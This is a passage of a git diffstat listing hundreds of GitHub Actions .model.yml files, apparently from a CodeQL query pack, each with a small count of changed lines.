+- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 2 +- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../broadinstitute_gatk.model.yml | 2 +- .../canonical_multipass.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../chocobozzz_peertube.model.yml | 2 +- .../cilium_cilium-cli.model.yml | 2 +- .../composite-actions/cilium_cilium.model.yml | 2 +- .../citusdata_citus.model.yml | 2 +- .../clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 2 +- .../conan-io_conan-center-index.model.yml | 2 +- .../corretto_corretto-8.model.yml | 2 +- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 2 +- .../composite-actions/d2l-ai_d2l-en.model.yml | 2 +- ...build-check-deploy-gradle-action.model.yml | 2 +- .../datadog_dd-trace-dotnet.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-js.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../davatorium_rofi.model.yml | 2 +- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 +- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 2 +- .../diggerhq_digger.model.yml | 2 +- .../diku-dk_futhark.model.yml | 2 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 2 +- .../drawpile_drawpile.model.yml | 2 +- .../eksctl-io_eksctl.model.yml | 2 +- .../elastic_apm-agent-dotnet.model.yml | 2 +- .../elastic_apm-agent-java.model.yml | 2 +- .../elastic_apm-server.model copy.yml | 2 +- .../elementor_elementor.model.yml | 2 +- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 2 +- .../eonasdan_tempus-dominus.model.yml | 2 +- .../composite-actions/erlang_otp.model.yml | 2 +- .../esphome_esphome.model.yml | 2 +- .../composite-actions/expensify_app.model.yml | 2 +- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 2 +- .../firebase_firebase-ios-sdk.model.yml | 2 +- .../flagsmith_flagsmith.model.yml | 2 +- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 2 +- .../composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 2 +- .../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../composite-actions/gaphor_gaphor.model.yml | 2 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 2 +- .../composite-actions/github_ruby.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- .../go-spatial_tegola.model.yml | 2 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 2 +- .../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 4 ++-- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 ++-- .../home-assistant_android.model.yml | 2 +- .../homebrew_actions.model.yml | 2 +- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../igniterealtime_openfire.model.yml | 2 +- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 2 +- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../ionic-team_ionicons.model.yml | 2 +- .../ionic-team_stencil.model.yml | 2 +- .../composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 4 ++-- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../keycloak_keycloak.model.yml | 2 +- .../composite-actions/kserve_kserve.model.yml | 2 +- .../kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- .../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 2 +- .../kyverno_kyverno.model.yml | 2 +- .../composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../ldc-developers_ldc.model.yml | 2 +- .../ledgerhq_ledger-live.model.yml | 2 +- .../composite-actions/lerna_lerna.model.yml | 2 +- .../composite-actions/lf-edge_eve.model.yml | 2 +- .../libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../lightning-ai_torchmetrics.model.yml | 2 +- .../linkerd_linkerd2.model.yml | 4 ++-- .../logseq_publish-spa.model.yml | 2 +- .../macvim-dev_macvim.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- .../maplibre_maplibre-native.model.yml | 2 +- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 2 +- .../mdanalysis_mdanalysis.model.yml | 2 +- .../medic_cht-core.model.yml | 2 +- .../medusajs_medusa.model.yml | 2 +- .../metabase_metabase.model.yml | 2 +- ...etamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 2 +- .../composite-actions/microsoft_wsl.model.yml | 2 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 2 +- .../mozilla_addons-server.model.yml | 2 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mumble-voip_mumble.model.yml | 2 +- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 2 +- ..._optic-release-automation-action.model.yml | 2 +- .../composite-actions/nektos_act.model.yml | 2 +- ...4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 2 +- .../composite-actions/novuhq_novu.model.yml | 4 ++-- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 2 +- .../composite-actions/ocaml_dune.model.yml | 2 +- .../oneflow-inc_oneflow.model.yml | 2 +- ...metry_opentelemetry-ruby-contrib.model.yml | 2 +- ...pen-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- ...enzeppelin-contracts-upgradeable.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts.model.yml | 2 +- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 2 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 2 +- .../owntracks_android.model.yml | 2 +- .../pandas-dev_pandas.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- .../phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 ++-- .../composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 2 +- .../composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../projectnessie_nessie.model.yml | 2 +- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 2 +- .../python-poetry_poetry.model.yml | 2 +- .../composite-actions/python_mypy.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../composite-actions/quay_clair.model.yml | 2 +- .../quickwit-oss_quickwit.model.yml | 2 +- .../composite-actions/r-lib_actions.model.yml | 2 +- .../randombit_botan.model.yml | 2 +- .../raspberrypi_documentation.model.yml | 2 +- .../ray-project_kuberay.model.yml | 2 +- .../readthedocs_actions.model.yml | 2 +- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 2 +- .../composite-actions/risc0_risc0.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../composite-actions/rook_rook.model.yml | 2 +- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 2 +- .../composite-actions/rusefi_rusefi.model.yml | 2 +- .../saltstack_salt.model.yml | 2 +- .../composite-actions/saltstack_salt.yml | 2 +- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 2 +- .../composite-actions/scitools_iris.model.yml | 2 +- .../scylladb_scylla-operator.model.yml | 2 +- .../shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- ...ode_react-webpack-rails-tutorial.model.yml | 2 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 2 +- .../solidusio_solidus.model.yml | 2 +- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 2 +- .../sonic-pi-net_sonic-pi.model.yml | 2 +- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml | 2 +- .../spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- ...spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../square_workflow-kotlin.model.yml | 2 +- .../stefanprodan_podinfo.model.yml | 2 +- .../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 ++-- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 2 +- .../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../treeverse_lakefs.model.yml | 2 +- .../trezor_trezor-firmware.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../trunk-io_trunk-action.model.yml | 2 +- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 2 +- .../composite-actions/vkcom_vkui.model.yml | 2 +- .../vuetifyjs_vuetify.model.yml | 2 +- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 2 +- .../composite-actions/wazuh_wazuh.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 2 +- .../composite-actions/zcash_zcash.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 2 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../reusable-workflows/adap_flower.model.yml | 2 +- .../aio-libs_multidict.model.yml | 2 +- .../aio-libs_yarl.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- .../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 2 +- .../reusable-workflows/apache_flink.model.yml | 2 +- .../reusable-workflows/apache_spark.model.yml | 2 +- .../argilla-io_argilla.model.yml | 2 +- .../argoproj_argo-cd.model.yml | 2 +- .../argoproj_argo-rollouts.model.yml | 2 +- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 2 +- .../bbq-beets_avocaddo-cmw.model.yml | 2 +- .../bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 2 +- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 2 +- .../celo-org_celo-blockchain.model.yml | 2 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 2 +- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../clickhouse_clickhouse.model.yml | 2 +- .../cloudfoundry_cli.model.yml | 2 +- ...thub-action-matrix-outputs-write.model.yml | 2 +- .../cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../com-lihaoyi_mill.model.yml | 2 +- .../cosmos_ibc-go.model.yml | 2 +- .../crowdsecurity_crowdsec.model.yml | 2 +- .../cryptomator_cryptomator.model.yml | 2 +- .../daeuniverse_dae.model.yml | 2 +- .../dafny-lang_dafny.model.yml | 2 +- .../dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../dbt-labs_dbt-bigquery.model.yml | 2 +- .../dbt-labs_dbt-core.model.yml | 2 +- .../dbt-labs_dbt-snowflake.model.yml | 2 +- .../decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 2 +- .../dfhack_dfhack.model.yml | 2 +- .../docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../earthly_earthly.model.yml | 2 +- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 ++-- .../envoyproxy_envoy.model.yml | 2 +- .../etcd-io_bbolt.model.yml | 2 +- .../reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../eventstore_eventstore.model.yml | 2 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../falcosecurity_falco.model.yml | 2 +- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 2 +- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 2 +- .../foundatiofx_foundatio.model.yml | 2 +- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 2 +- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 2 +- .../getsentry_sentry-unity.model.yml | 2 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 2 +- .../hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 2 +- .../hashicorp_terraform-cdk.model.yml | 2 +- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 ++-- .../reusable-workflows/heroku_cli.model.yml | 2 +- .../hitobito_hitobito.model.yml | 4 ++-- .../home-assistant_operating-system.model.yml | 2 +- .../homuler_mediapipeunityplugin.model.yml | 2 +- .../huggingface_doc-builder.model.yml | 2 +- .../huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../reusable-workflows/ibm_sarama.model.yml | 2 +- ...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../kairos-io_kairos.model.yml | 2 +- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../reusable-workflows/kiali_kiali.model.yml | 2 +- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 4 ++-- .../reusable-workflows/kumahq_kuma.model.yml | 2 +- .../labring_sealos.model.yml | 2 +- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 2 +- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 2 +- .../reusable-workflows/llvm_circt.model.yml | 2 +- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- ...anticoresoftware_manticoresearch.model.yml | 2 +- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 2 +- .../matter-labs_zksync-era.model.yml | 2 +- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 2 +- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 2 +- .../meshtastic_firmware.model.yml | 2 +- .../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 2 +- .../microsoft_msquic.model.yml | 2 +- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 2 +- .../reusable-workflows/moby_moby.model.yml | 2 +- .../mosaicml_composer.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mudler_localai.model.yml | 2 +- .../mustardchef_wsabuilds.model.yml | 2 +- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 2 +- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../newrelic_node-newrelic.model.yml | 2 +- .../nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../nocodb_nocodb.model.yml | 2 +- .../reusable-workflows/novuhq_novu.model.yml | 2 +- .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 2 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 2 +- .../open-goal_jak-project.model.yml | 2 +- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- ...try_opentelemetry-dotnet-contrib.model.yml | 2 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...entelemetry-java-instrumentation.model.yml | 2 +- ...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 2 +- .../openbao_openbao.model.yml | 2 +- .../openhab_openhab-docs.model.yml | 2 +- .../openmined_pysyft.model.yml | 2 +- .../opentofu_opentofu.model.yml | 2 +- .../openttd_openttd.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 2 +- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 2 +- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 2 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 2 +- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 2 +- .../preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 2 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 2 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 2 +- .../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- .../rustdesk_rustdesk.model.yml | 2 +- .../saadeghi_daisyui.model.yml | 2 +- .../sagemath_sage.model.yml | 2 +- .../schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 2 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 2 +- .../speedb-io_speedb.model.yml | 2 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 2 +- .../stdlib-js_stdlib.model.yml | 2 +- .../stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 ++-- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 4 ++-- .../tgstation_tgstation.model.yml | 2 +- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 2 +- .../tiledb-inc_tiledb.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 2 +- .../uyuni-project_uyuni.model.yml | 2 +- .../vert-x3_vertx-hazelcast.model.yml | 2 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../reusable-workflows/werf_werf.model.yml | 2 +- .../widdix_aws-cf-templates.model.yml | 2 +- .../wildfly_wildfly.model.yml | 2 +- .../yt-dlp_yt-dlp.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 4 ++-- .../ext/manual/8398a7_action-slack.model.yml | 2 +- .../manual/AsasInnab_regex-action.model.yml | 2 +- .../ext/manual/MeilCli_regex-match.model.yml | 2 +- ...rSource_sonarcloud-github-action.model.yml | 2 +- .../Steph0_dotenv-configserver.model.yml | 2 +- ...us_github-action-files-in-commit.model.yml | 2 +- .../manual/aarcangeli_load-dotenv.model.yml | 2 +- .../ab185508_file-type-finder.model.yml | 2 +- ...ons-ecosystem_action-regex-match.model.yml | 2 +- .../manual/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 2 +- .../manual/akefirad_loadenv-action.model.yml | 2 +- .../manual/akhileshns_heroku-deploy.model.yml | 4 ++-- ...bell_pull-request-comment-branch.model.yml | 2 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- .../ext/manual/anchore_sbom-action.model.yml | 2 +- .../ext/manual/anchore_scan-action.model.yml | 2 +- .../andresz1_size-limit-action.model.yml | 2 +- .../android-actions_setup-android.model.yml | 2 +- .../ankitjain28may_list-files-in-pr.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- .../ext/manual/appleboy_ssh-action.model.yml | 2 +- ql/lib/ext/manual/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 2 +- .../aszc_change-string-case-action.model.yml | 2 +- ...aamMavridis_files-changed-action.model.yml | 2 +- ...ctions_configure-aws-credentials.model.yml | 2 +- .../axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/manual/azure_cli.model.yml | 2 +- ql/lib/ext/manual/azure_powershell.model.yml | 2 +- .../ext/manual/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 2 +- .../manual/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 4 ++-- .../manual/bufbuild_buf-lint-action.model.yml | 4 ++-- .../bufbuild_buf-setup-action.model.yml | 2 +- .../c-py_action-dotenv-to-setenv.model.yml | 2 +- .../ext/manual/cachix_cachix-action.model.yml | 4 ++-- ql/lib/ext/manual/changesets_action.model.yml | 2 +- .../cloudflare_wrangler-action.model.yml | 2 +- .../cosq-network_dotenv-loader.model.yml | 2 +- .../manual/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 2 +- .../manual/cypress-io_github-action.model.yml | 2 +- .../dailydotdev_action-devcard.model.yml | 2 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 2 +- 